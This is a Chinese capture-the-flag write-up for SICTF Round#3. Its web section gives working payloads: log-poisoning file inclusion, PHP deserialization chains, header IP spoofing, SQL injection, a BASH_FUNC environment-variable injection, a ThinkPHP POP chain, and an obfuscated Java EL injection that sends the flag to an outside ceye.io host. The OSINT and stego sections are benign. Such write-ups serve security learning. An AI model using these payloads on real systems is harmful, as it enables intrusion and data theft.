SICTF Round#3

admin 2024年2月21日07:37:49评论21 views1字数 8852阅读29分30秒阅读模式

0x00:前言

好久没沉下心整理一下自己的笔记了,借着比赛氛围顺带复习了一下自己的笔记。还是很不错的。文章可能有些地方存在不足,欢迎大佬们指出。放的只是解出来的题目。区块链是真懵逼。

0x01WEB-篇

(1)100%_upload(文件上传、文件包含)

SICTF Round#3

解法1:
开局是这种画面,我想到会不会存在文件包含漏洞呢?SICTF Round#3

尝试一下,发现,确实存在文件包含漏洞。这里就有一个想法,能不能文件包含日志玩玩。

SICTF Round#3

SICTF Round#3

成功,开始上马。
发现好像不需要上马。

SICTF Round#3

SICTF Round#3

方法2:
先传一个图片马,再文件包含它就可以了。这里我记得会检测php这个关键词。直接换种写法就好了。

SICTF Round#3

SICTF Round#3

(2)EZ_SSRF:

SICTF Round#3

SICTF Round#3

一看就是反序列化和ssrf结合。
直接搓一个链子。

```<?phpclass client{    public $url;    public $payload;    public function __construct(){        $url = "file:///flag";        $payload = "system("cat /flag");";
}}
$obj = new client();$obj ->url = "file:///etc/passwd";$obj ->payload = "system('cat /flag')";echo serialize($obj);```

先简单看看,file这个协议禁了嘛

SICTF Round#3

SICTF Round#3

file协议是可以使用的。尝试读取flag看看。看看可以不。发现并没有什么回显。做了过滤。

SICTF Round#3

尝试了各种手法发现,绕不过啊。回过头仔细研究一下代码,发现提示

SICTF Round#3

那么简单的扫一下目录看看,看看有什么隐藏的文件。扫出来一个admin.php和一个flag.php
尝试使用伪协议去读,发现只能读取admin.php的东西。flag.php的里面还是读取不出来。无果,尝试分析admin.php的东西。

SICTF Round#3

SICTF Round#3

简单的看来一下,也就是说访问这个admin.php如果访问者的ip地址与允许ip的地址相同就让他拿走flag。这里就很明显了。直接ip伪造。

```<?phperror_reporting(0);include "flag.php";highlight_file(__FILE__);$allowed_ip = "127.0.0.1";if ($_SERVER['REMOTE_ADDR'] !== $allowed_ip) {    die("You can't get flag");} else {    echo $flag;}?>```

重新构造一下链子

SICTF Round#3

然后抓包到burp里面操作一下。懒得检验是哪个字段了,直接无脑复制笔记。

```X-Forward-For:127.0.0.1X-Remote-Ip:127.0.0.1X-remote-ip:127.0.0.1X-Real-Ip:127.0.0.1X-Client-Ip:127.0.0.1```

SICTF Round#3

SICTF Round#3

(3)hacker

SICTF Round#3

SICTF Round#3

SICTF Round#3

发现=joe和=alice都没什么用。发现一个提示flag在flag表中,尝试等于flag试试。

SICTF Round#3

通过语句验证存在注入。

SICTF Round#3

SICTF Round#3

存在一个ctf数据库

SICTF Round#3

SICTF Round#3

这里禁了很多东西。包括information这个关键词以及各种空格等。这里我们不知道列名。恰好有种方法就叫做无列名sql注入。
参考文章:
https://johnfrod.top/安全/无列名注入绕过information_schema/

SICTF Round#3

查看使用了哪些存储引擎

SICTF Round#3

查看有当前数据库下存在哪些表格

SICTF Round#3

这里采用的是子查询,无列名注入的方式。

SICTF Round#3

原理如下:
可以使用union联合查询,可以直接给当前整个查询的列分别赋值1,2,3名字。

SICTF Round#3

将这个虚拟出来的表,作为一个临时表。来查数据

SICTF Round#3

SICTF Round#3

 (4)Not just unserialize(反序列化、环境变量注入)

 <?php
highlight_file(__FILE__);class start{ public $welcome; public $you; public function __destruct(){ $this->begin0fweb(); } public function begin0fweb(){ $p='hacker!'; $this->welcome->you = $p; }}
class SE{ public $year; public function __set($name, $value){ echo ' Welcome to new year! '; echo($this->year); }}
class CR { public $last; public $newyear;
public function __tostring() {
if (is_array($this->newyear)) { echo 'nonono'; return false; } if (!preg_match('/worries/i',$this->newyear)) { echo "empty it!"; return 0; }
if(preg_match('/^.*(worries).*$/',$this->newyear)) { echo 'Don't be worry'; } else { echo 'Worries doesn't exists in the new year '; empty($this->last->worries); } return false; }}
class ET{
public function __isset($name){ foreach ($_GET['get'] as $inject => $rce){ putenv("{$inject}={$rce}"); } system("echo "Haven't you get the secret?""); }}if(isset($_REQUEST['go'])){ unserialize(base64_decode($_REQUEST['go']));}?>
<?php
class start{ public $welcome; function __construct(){ $this->welcome = new SE; }}
class SE{ public $year; function __construct(){ $this->year=new CR; }}
class CR{ public $last; public $newyear = "nworries"; function __construct(){ $this->last = new ET; }}
class ET{
}
echo base64_encode(serialize(new start));
?>

关键代码:

public function __isset($name){    foreach ($_GET['get'] as $inject => $rce){        putenv("{$inject}={$rce}");    }    system("echo "Haven't you get the secret?"");}

涉及环境变量注入,参考P神博客:环境变量注入
Payload:

?go=Tzo1OiJzdGFydCI6MTp7czo3OiJ3ZWxjb21lIjtPOjI6IlNFIjoxOntzOjQ6InllYXIiO086MjoiQ1IiOjI6e3M6NDoibGFzdCI7TzoyOiJFVCI6MDp7fXM6NzoibmV3eWVhciI7czo4OiIKd29ycmllcyI7fX19&get[BASH_FUNC_echo%25%25]=()%20{%20cat%20/ffffllllllaaaaaaaaaaaaaaaaaaggggg;%20}


(5)Oyst3rPHP(md5、preg_match、TP6反序列化POP)

根据favicon.io得知是ThinkPHP,先拿TP漏扫工具一把梭,无果。扫描目录发现存在www.zip文件。

SICTF Round#3

拿到appcontrollerIndex.php文件内容:

<?phpnamespace appcontroller;use appBaseController;
class Index extends BaseController{
public function index(){ echo "RT,一个很简单的Web,给大家送一点分,再送三只生蚝,过年一起吃生蚝哈"; echo "<img src='../Oyster.png'"." />";
$payload = base64_decode(@$_POST['payload']); $right = @$_GET['left']; $left = @$_GET['right'];
$key = (string)@$_POST['key']; if($right != $left && md5($right) == md5($left)){ echo "Congratulations on getting your first oyster"; echo "<img src='../Oyster1.png'"." />";
if(preg_match('/.+?THINKPHP/is', $key)){ die("Oysters don't want you to eat"); } if(stripos($key, '603THINKPHP') === false){ die("!!!Oysters don't want you to eat!!!"); }
echo "WOW!!!Congratulations on getting your second oyster"; echo "<img src='../Oyster2.png'"." />"; @unserialize($payload); //最后一个生蚝在根目录,而且里面有Flag???咋样去找到它呢???它的名字是什么??? //在源码的某处注释给出了提示,这就看你是不是真懂Oyst3rphp框架咯!!! //小Tips:细狗函数┗|`O′|┛ 嗷~~ } }
public function doLogin(){ echo "666"; /*emmm我也不知道这是what,瞎写的*/ if ($this->request->isPost()) { $username = $this->request->post('username'); $password = $this->request->post('password');

if ($username == 'your_username' && $password == 'your_password') {
$this->success('Login successful', 'index/index'); } else {
$this->error('Login failed'); } } }}

第一份生蚝:md5弱类型绕过,构造传参:

GET: ?left=QNKCDZO&right=240610708

SICTF Round#3

第二份生蚝:preg_match回溯绕过

import requests
get = { "left": "QNKCDZO", "right": "240610708"}
post = { "key": "k" * 1000000 + "603THINKPHP",}
res = requests.post('http://yuanshen.life:37631/index.php/index/Index', params=get, data=post)print(res.text)

SICTF Round#3

SICTF Round#3

第三份生蚝:POP链

import requests
get = { "left": "QNKCDZO", "right": "240610708"}
post = { "key": "k" * 1000000 + "603THINKPHP", "payload": "TzoxNzoidGhpbmtcbW9kZWxcUGl2b3QiOjc6e3M6MjE6IgB0aGlua1xNb2RlbABsYXp5U2F2ZSI7YjoxO3M6MTk6IgB0aGlua1xNb2RlbABleGlzdHMiO2I6MTtzOjE3OiIAdGhpbmtcTW9kZWwAZGF0YSI7YToxOntzOjM6ImtleSI7czoyMToiY2F0IC9PeXN0MzMzMzMzM3IucGhwIjt9czoyMToiAHRoaW5rXE1vZGVsAHdpdGhBdHRyIjthOjE6e3M6Mzoia2V5IjtzOjY6InN5c3RlbSI7fXM6NToidGFibGUiO086MTc6InRoaW5rXG1vZGVsXFBpdm90Ijo3OntzOjIxOiIAdGhpbmtcTW9kZWwAbGF6eVNhdmUiO2I6MTtzOjE5OiIAdGhpbmtcTW9kZWwAZXhpc3RzIjtiOjE7czoxNzoiAHRoaW5rXE1vZGVsAGRhdGEiO2E6MTp7czozOiJrZXkiO3M6MjE6ImNhdCAvT3lzdDMzMzMzMzNyLnBocCI7fXM6MjE6IgB0aGlua1xNb2RlbAB3aXRoQXR0ciI7YToxOntzOjM6ImtleSI7czo2OiJzeXN0ZW0iO31zOjU6InRhYmxlIjtOO3M6Njoic3RyaWN0IjtiOjE7czo3OiJ2aXNpYmxlIjthOjE6e3M6Mzoia2V5IjtpOjE7fX1zOjY6InN0cmljdCI7YjoxO3M6NzoidmlzaWJsZSI7YToxOntzOjM6ImtleSI7aToxO319"}
res = requests.post('http://yuanshen.life:37631/index.php/index/Index', params=get, data=post) # POST相对GET方法可以承载的数据量更大print(res.text)

SICTF Round#3

(6) elInjection

拿到jar包直接在本地调试,关键代码如下:

//// Source code recreated from a .class file by IntelliJ IDEA// (powered by FernFlower decompiler)//
package com.example.elinjection.controller;
import de.odysseus.el.ExpressionFactoryImpl;import de.odysseus.el.util.SimpleContext;import java.util.ArrayList;import java.util.Iterator;import javax.el.ExpressionFactory;import javax.el.ValueExpression;import org.springframework.web.bind.annotation.RequestMapping;import org.springframework.web.bind.annotation.RequestParam;import org.springframework.web.bind.annotation.ResponseBody;import org.springframework.web.bind.annotation.RestController;
@RestControllerpublic class TestController { public TestController() { }
@RequestMapping({"/test"}) @ResponseBody public String test(@RequestParam(name = "exp") String exp) { ArrayList<String> list = new ArrayList(); list.add("Runtime"); list.add("exec"); list.add("invoke"); list.add("exec"); list.add("Process"); list.add("ClassLoader"); list.add("load"); list.add("Response"); list.add("Request"); list.add("Base64Utils"); list.add("ReflectUtils"); list.add("getWriter"); list.add("Thread"); list.add("defineClass"); list.add("bcel"); list.add("RequestAttributes"); list.add("File"); list.add("flag"); list.add("URL"); list.add("Command"); list.add("Inet"); list.add("System"); list.add("\u"); list.add("\x"); list.add("'"); Iterator var3 = list.iterator();
String s; do { if (!var3.hasNext()) { ExpressionFactory expressionFactory = new ExpressionFactoryImpl(); SimpleContext simpleContext = new SimpleContext(); ValueExpression valueExpression = expressionFactory.createValueExpression(simpleContext, exp, String.class); valueExpression.getValue(simpleContext); return exp; }
s = (String)var3.next(); } while(!exp.contains(s));
return "No"; }}

黑名单过滤了一堆,考虑调用JS引擎绕过,这个地方直接用unicode字符绕过黑名单过滤。

POST /test HTTP/1.1Host: yuanshen.life:23333Accept-Encoding: gzip, deflateAccept: */*Accept-Language: enUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.66 Safari/537.36Connection: closeContent-Type: application/x-www-form-urlencodedContent-Length: 688
exp=${"".getClass().forName("javax.script.ScriptEngineManager").newInstance().getEngineByName("JavaScript").eval("function test(a){ return eval(a)};test(String.fromCharCode(106,97,118,97,46,108,97,110,103,46,82,117,110,116,105,109,101,46,103,101,116,82,117,110,116,105,109,101,40,41,46,101,120,101,99,40,39,98,97,115,104,32,45,99,32,123,101,99,104,111,44,89,109,70,122,97,67,65,116,89,121,65,105,89,51,86,121,98,67,66,103,76,51,74,108,89,87,82,109,98,71,70,110,89,67,53,121,98,122,100,111,77,88,107,117,89,50,86,53,90,83,53,112,98,121,73,61,125,124,123,98,97,115,101,54,52,44,45,100,125,124,123,98,97,115,104,44,45,105,125,39,41))")}

SICTF Round#3

SICTF Round#3

https://blog.csdn.net/qq_46548764/article/details/136199546?utm_source=miniapp_weixin

0x02CRYPTO篇:

SICTF Round#3

SICTF Round#3

0x03Forensics(社工)篇:

(1)OSINT签到:

SICTF Round#3

SICTF Round#3

SICTF Round#3

这种当然得找特征,然后去找相似图片。然后对应的去找这个图片的来源地方。大多数时候会出来这个图片的地点。

SICTF Round#3

SICTF Round#3

SICTF Round#3

然后按照flag的格式填写就好了。
SICTF{海南省_海口市_琼山区_红城湖公园}

(2)树木的压迫:

SICTF Round#3

SICTF Round#3

不亏是压迫,这样子,百度识图也干不出来啊。直接放大放大。

SICTF Round#3

SICTF Round#3

SICTF Round#3

SICTF{四川省_达州市_通川区_凤凰大道376号_达州市体育中心}

(3)真的签到

SICTF Round#3

老方法,切割标志性建筑,应该是这个摩天轮吧。

SICTF Round#3

SICTF Round#3

SICTF Round#3

这次需要知道商场名字

SICTF Round#3

(4) 签退:


SICTF Round#3

谷歌识图,得知是南非开普敦。

SICTF Round#3

谷歌还是挺好玩的,可以AR跑图

SICTF Round#3

SICTF Round#3

0x04RE篇:

SICTF Round#3

SICTF Round#3

SICTF Round#3

SICTF Round#3

MISC篇:

拉格朗日:

SICTF Round#3

SICTF Round#3

SICTF Round#3

解压压缩包,一个wav音频加图片

SICTF Round#3

首先查看频谱图,老套路了

SICTF Round#3

得到字符givemeyourlagrange

再研究剩下的图片,图片名为steg,估计是steg隐写,刚得到的字符应该是密码,直接上工具steghide

SICTF Round#3

密码不对?有音频文件名没看,翻译一下,lagrange是大写的再试一下givemeyourLAGRANGE

SICTF Round#3

SICTF Round#3

注:部分文章在CSDN发布,有感兴趣的小伙伴,可以看看其他文章。大佬勿喷。https://blog.csdn.net/qq_46548764/article/details/136199546?utm_source=miniapp_weixin


原文始发于微信公众号(小呆安全):SICTF Round#3

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2024年2月21日07:37:49
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   SICTF Round#3https://cn-sec.com/archives/2510696.html

发表评论

匿名网友 填写信息